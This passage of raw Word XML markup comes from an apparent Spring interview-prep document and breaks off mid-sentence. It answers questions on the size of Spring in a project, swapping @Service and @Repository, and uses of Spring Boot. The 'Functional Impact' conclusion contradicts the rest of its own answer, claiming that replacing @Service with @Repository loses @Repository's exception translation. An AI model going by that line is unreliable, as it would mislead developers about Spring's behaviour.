      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>
    </w:p>
    <w:p w14:paraId="0D696272" w14:textId="4AB2C8F5" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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 size of Spring in a project depends on several factors, including the specific Spring modules and dependencies that are included. The decision on how large the Spring framework should be in your project is typically influenced by the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF26A4F" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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1. Project Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E529B2" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Application Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you're building a microservice, you might only need Spring Boot, Spring Web, and Spring Data JPA. For a full-fledged enterprise application, you might need additional modules like Spring Security, Spring Integration, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D7910" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Feature Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The more features you need, the more Spring modules you'll include, which increases the size. For example, if you need security features, you'll include spring-security, which adds more dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A4E21" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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2. Dependency Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B41072" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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 size of the Spring framework will depend on the dependencies that are included in your pom.xml (for Maven) or build.gradle (for Gradle) file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7B1B2" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are using Spring Boot, it provides a wide array of auto-configured dependencies that include many commonly used Spring modules by default, but you can control which dependencies are included by modifying the spring-boot-starter modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3998A9B2" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your application is using microservices architecture, you might include Spring Cloud, which adds a considerable amount of dependencies for distributed system features like configuration management, service discovery, and circuit breakers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2D5B3" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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3. Spring Boot and Dependency Injection (DI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD0B2B" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Spring Boot Starters</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are using Spring Boot, it uses "starters" to include only the necessary dependencies for certain functionalities. For example, spring-boot-starter-web will include dependencies like Spring MVC and Tomcat (if you are not using a different server), whereas spring-boot-starter-data-jpa includes Spring Data JPA dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6253FB" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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lastRenderedPageBreak/>
        <w:t>You can choose only the starters that match your requirements, controlling the size of Spring in your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C721D" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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4. Application Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF2A9A4" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you're building microservices, you typically want a lightweight application, so you might use only necessary Spring modules (Spring Boot, Spring Data JPA, etc.). This keeps the size smaller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62A9A8" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Monolithic Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Larger, monolithic applications may require a broader range of Spring modules for features like security, messaging, and transaction management, which can increase the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A136AE6" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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5. Spring Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8BD5E" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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e configuration of your Spring application (either via XML configuration or annotation-based configuration) determines how many different beans, services, and modules are included in the application context, affecting the overall size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52858162" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C17C51" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>architect</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the project decides the size of Spring in the project based on the application's requirements. By selecting the right Spring modules (starters or dependencies) according to the feature set and scale of the application, you can control the size and performance of the Spring-based application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035D169" w14:textId="04579F84"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01C9A49">
          <v:rect id="_x0000_i2595" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059544D" w14:textId="29C52449" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22966">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="606" w:name="_Toc196308086"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen when we replace @Service instead of @Repository</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>
    </w:p>
    <w:p w14:paraId="0ECFACB0" w14:textId="2EB2F5A4" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15" w:rsidP="00D774B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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When you replace @Service with @Repository in a Spring application, the following changes and effects may occur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50208991" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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1. Semantic Meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A7145" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is typically used to mark a service class, which contains business logic. It indicates that the class holds some service functionality and is a candidate for Spring's component scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E825A1" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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epository</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is used to mark a class as a Data Access Object (DAO) that interacts with the database. It is a specialization of @Component and serves a specific purpose, which is to encapsulate the interaction with the data source (e.g., JPA, JDBC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F868DC" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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 xml:space="preserve">While both annotations are used for defining Spring beans and making them eligible for dependency injection, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary difference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> behind each annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB6B75" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for business/service logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B62F70" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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epository</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for data access and DAO logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46B48D" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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In practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, using @Repository instead of @Service won’t break the application, as both annotations result in a Spring bean being created, but it changes the intended meaning or role of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C896F65" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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2. Exception Translation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F835E5E" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a built-in exception translation mechanism. It automatically translates any database-related exceptions (like SQLException) into Spring's DataAccessException (a runtime exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC80C78" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Why this happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring's @Repository provides the mechanism to handle exceptions more specifically related to data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E934D01" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15" w:rsidP="00D774B4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Effect if you replace @Repository with @Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The exception translation provided by @Repository will not happen when using @Service. This means that database-related exceptions will not be automatically translated into Spring's DataAccessException. You would need to handle those exceptions manually or using custom exception handling mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE117A" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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3. Component Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F167BC" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Both @Service and @Repository are specializations of @Component, which means that Spring will scan the class and create a bean for dependency injection regardless of which annotation is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C257F38" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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4. Purpose and Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E8525" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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pository signals to other developers that the class is responsible for interacting with a database, while @Service indicates that the class contains business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796DBBE" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Replacing @Repository with @Service would confuse the semantics, making it unclear whether the class is intended for data access or business logic. It is a good practice to use the appropriate annotations to make the class's role clearer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178F93D" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE84AF" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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Functional Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replacing @Service with @Repository will still allow the class to be managed by Spring, but it loses the exception translation mechanism that @Repository provides for database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734FA39" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Design Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It will affect the clarity of your codebase. Using @Service in a DAO class or @Repository in a service class will confuse the intended roles of the class and can lead to code maintenance challenges in larger projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767055F0" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00D774B4" w:rsidRDefault="00271F15" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thus, it is always best to use @Service for service-layer components and @Repository for DAO/data access components for proper separation of concerns and clear intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A662CC" w14:textId="3BB98223"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="77A623D4">
          <v:rect id="_x0000_i2596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86DA4A" w14:textId="5D49EB4E" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00F50C69">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="607" w:name="_Toc196308087"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain uses of SpringBoot application</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:p w14:paraId="0D9A1687" w14:textId="2F94683F" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F15"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 Boot is widely used in various types of applications, thanks to its simplicity, productivity, and ability to streamline the development process. Below are some common use cases for Spring Boot applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EF2E3" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Microservices Development:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498D0FF"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Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot is widely used in building </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture, where each service is small, independent, and focused on a specific business functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65969B14"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t simplifies the creation of stand-alone applications, providing embedded servers and easy configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8434D"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Integration with Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes it easier to handle service discovery, load balancing, and centralized configuration, all essential parts of a microservice ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAD688" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="002C6305" w:rsidRDefault="00271F1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Web Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E951F63"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RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot is extensively used to build RESTful APIs with minimal setup. The built-in support for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes it easy to create controllers, map endpoints, and handle HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1D5BC"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Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot can be used to build traditional web applications by integrating with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</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Thymeleaf</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
